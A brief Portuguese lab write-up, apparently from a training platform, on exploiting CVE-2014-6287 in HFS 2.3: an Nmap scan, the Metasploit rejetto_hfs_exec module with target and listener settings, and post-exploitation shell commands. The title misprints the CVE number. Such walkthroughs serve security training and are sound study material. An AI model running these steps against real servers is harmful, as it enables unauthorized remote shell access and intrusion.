
Metasploit RCE no HFS 2.3 - CVE-2014-62
Metasploit RCE em HFS 2.3 - CVE-2014-62
🔖 Título do Projeto
> Execução Remota de Código via HTTP File Server (HFS 2.3)
⚙ Ferramentas Utilizadas • Kali Linux • Nmap • Metasploit • Alvo: HFS 2.3 no Windows 7
🔐 Detalhes da Vulnerabilidade • Nome: CVE-2014-6287 • Tipo: Execução Remota de Código • Causa: Entrada não validada no scripting do HFS • Impacto: Acesso de shell não autenticado
🔍 Metodologia (Passo a Passo)
🔹 Passo 1: Levantamento de Informações (Nmap)
• nmap -sV demo.ine.local (ip do alvo)
• porta aberta encontrada : 80
• serviço : rejetto HTTP file server 2.3

🔹 Passo 2: Exploração (Metasploit)
• Msfconsole
• Pesquise por HFS ou rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 Passo 3: Pós-Exploração
após executar, você obterá uma sessão do meterpreter use o comando : shell
• whoami • ipconfig • dir

